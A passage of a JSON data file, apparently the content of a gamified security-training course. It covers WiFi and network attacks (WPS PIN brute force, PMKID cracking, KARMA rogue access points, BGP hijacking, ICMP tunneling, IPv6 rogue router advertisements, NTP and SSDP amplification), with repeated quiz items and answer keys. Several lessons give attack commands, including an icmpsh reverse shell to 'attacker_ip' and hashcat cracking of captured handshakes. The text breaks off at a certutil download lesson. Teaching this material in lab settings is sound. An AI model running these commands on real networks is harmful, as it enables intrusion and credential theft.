process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1}]},{"id":"na-wps-attack","cat":"Network Attacks","title":"WPS Pin Attack","diff":2,"xp":150,"intro":"Brute-force the WPS PIN to recover the WiFi password.","sections":[{"type":"text","content":"WPS uses an 8-digit PIN with a checksum. Only 11,000 combinations needed. Reaver and Bully automate the brute force."},{"type":"code","lang":"bash","content":"# Check for WPS\nwash -i wlan0mon\n# Brute force WPS PIN\nreaver -i wlan0mon -b AP_BSSID -vv\nbully -b AP_BSSID -c 6 wlan0mon\n# Pixie dust (offline) if supported\nreaver -i wlan0mon -b AP_BSSID -K"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"WPS PIN brute force needs only...","opts":["Billions of attempts","~11,000 attempts (8 digits with checksum reduces search space)","The WiFi password","Physical access to the router"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2}]},{"id":"na-pmkid-attack","cat":"Network Attacks","title":"PMKID WiFi Attack","diff":2,"xp":150,"intro":"Capture the PMKID from the AP without any clients connected.","sections":[{"type":"text","content":"PMKID is sent in the first message of the 4-way handshake. Capture it from the AP directly \u2014 no need to wait for or deauth a client."},{"type":"code","lang":"bash","content":"# Capture PMKID with hcxdumptool\nhcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1\n# Convert for hashcat\nhcxpcapngtool capture.pcapng -o hash.hc22000\n# Crack\nhashcat -m 22000 hash.hc22000 rockyou.txt"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"PMKID attack advantage over handshake capture...","opts":["It's faster to crack","No client needs to be connected (capture directly from AP)","It works on WEP","It bypasses WPA3"],"ans":1},{"type":"quiz","q":"UDP is...","opts":["Connection-oriented","Connectionless","Encrypted","Slower than TCP"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2}]},{"id":"na-karma-attack","cat":"Network Attacks","title":"KARMA WiFi Attack","diff":3,"xp":200,"intro":"Respond to all WiFi probe requests to lure clients to your AP.","sections":[{"type":"text","content":"KARMA: clients probe for previously connected networks. Your rogue AP responds 'yes, I'm that network' to every probe, and clients auto-connect."},{"type":"code","lang":"bash","content":"# Using hostapd-mana (KARMA-enabled)\nhostapd-mana karma.conf\n# Or with bettercap\nbettercap -iface wlan0 -eval 'wifi.recon on; wifi.ap'\n# Capture credentials from auto-connecting clients"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"KARMA works because clients...","opts":["Verify AP identity","Probe for known networks and trust any AP that claims to be one","Never auto-connect","Check certificates"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2}]},{"id":"na-ntp-amplification","cat":"Network Attacks","title":"NTP Amplification DDoS","diff":2,"xp":150,"intro":"Abuse NTP monlist for massive traffic amplification.","sections":[{"type":"text","content":"NTP's monlist command returns the last 600 clients \u2014 a small request generates a huge response. Spoofing the source IP floods the target."},{"type":"code","lang":"bash","content":"# Check for vulnerable NTP server\nntpdc -n -c monlist target_ntp\n# Amplification factor: ~500x\n# Defense: disable monlist, use rate limiting\n# ntpd config: disable monitor"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"NTP amplification works because monlist...","opts":["Encrypts traffic","Returns a large response (600 clients) to a small request","Requires authentication","Only works locally"],"ans":1},{"type":"quiz","q":"UDP is...","opts":["Connection-oriented","Connectionless","Encrypted","Slower than TCP"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2}]},{"id":"na-bgp-hijacking","cat":"Network Attacks","title":"BGP Route Hijacking","diff":5,"xp":300,"intro":"Announce someone else's IP prefix to redirect their traffic through you.","sections":[{"type":"text","content":"BGP has no authentication. Any AS can announce any prefix. Announce a more specific route (/25 vs /24) and traffic flows to you instead of the legitimate owner."},{"type":"code","lang":"bash","content":"# BGP hijacking is done at the ISP level\n# Announce a more specific prefix:\n# Legitimate: 1.2.3.0/24 via AS100\n# Attacker:   1.2.3.0/25 via AS666 (more specific wins)\n# All traffic to 1.2.3.0/25 now routes to AS666\n# Detection: bgpstream.com, RIPE RIS"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"BGP hijacking works because BGP...","opts":["Uses encryption","Has no built-in route authentication","Requires mutual authentication","Is a local protocol"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2}]},{"id":"na-icmp-tunnel","cat":"Network Attacks","title":"ICMP Tunneling","diff":3,"xp":200,"intro":"Encapsulate data inside ICMP echo requests to bypass firewalls.","sections":[{"type":"text","content":"ICMP (ping) is often allowed through firewalls. Encapsulate TCP/IP traffic inside ICMP packets to create a covert channel."},{"type":"code","lang":"bash","content":"# icmpsh (simple ICMP reverse shell)\n# Attacker:\npython3 icmpsh_m.py attacker_ip target_ip\n# Target:\nicmpsh.exe -t attacker_ip\n# Or ptunnel for ICMP tunneling\nptunnel -p proxy_ip -lp 8080 -da target_ip -dp 80"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"ICMP tunneling bypasses firewalls because...","opts":["ICMP is encrypted","Firewalls often allow ICMP (ping) traffic","ICMP uses random ports","ICMP is invisible"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2}]},{"id":"na-ipv6-slaac","cat":"Network Attacks","title":"IPv6 SLAAC Attack","diff":3,"xp":200,"intro":"Exploit Stateless Address Autoconfiguration for man-in-the-middle.","sections":[{"type":"text","content":"Send Router Advertisements on IPv6 to become the default gateway. Hosts auto-configure with your router \u2014 all traffic flows through you."},{"type":"code","lang":"bash","content":"# Send rogue Router Advertisement\natk6-fake_router6 eth0 2001:db8::/64\n# Or with THC-IPv6\nparasite6 eth0\n# Defense: RA Guard on switches\n# Detect: rogue RA detection tools"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SLAAC attacks work because IPv6 hosts...","opts":["Ignore router advertisements","Auto-configure using any Router Advertisement they receive","Require manual configuration","Validate RA signatures"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2}]},{"id":"na-ssdp-amp","cat":"Network Attacks","title":"SSDP Amplification","diff":2,"xp":150,"intro":"Abuse UPnP's SSDP protocol for DDoS amplification.","sections":[{"type":"text","content":"SSDP (port 1900 UDP) responds to M-SEARCH with large XML device descriptions. Spoofed source IP + broadcast = massive amplification."},{"type":"code","lang":"bash","content":"# Check for SSDP reflectors\nnmap -sU -p 1900 --script upnp-info target\n# Amplification factor: ~30x\n# Defense: disable UPnP on internet-facing devices\n# Block UDP 1900 at the perimeter"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SSDP amplification abuses which protocol?","opts":["HTTP","UPnP/SSDP (Universal Plug and Play)","DNS","NTP"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2}]},{"id":"px-certutil-dl","cat":"Post-Exploitation","title":"Certutil File Download","diff":1,"xp":50,"intro":"Download files on Windows using a built-in binary.","sections":[{"type":"text","content":"certutil is a legitimate Windows binary for certificate management. It can also download files \u2014 a classic Living Off the Land technique."},{"type":"code","lang":"bash","content":"certutil 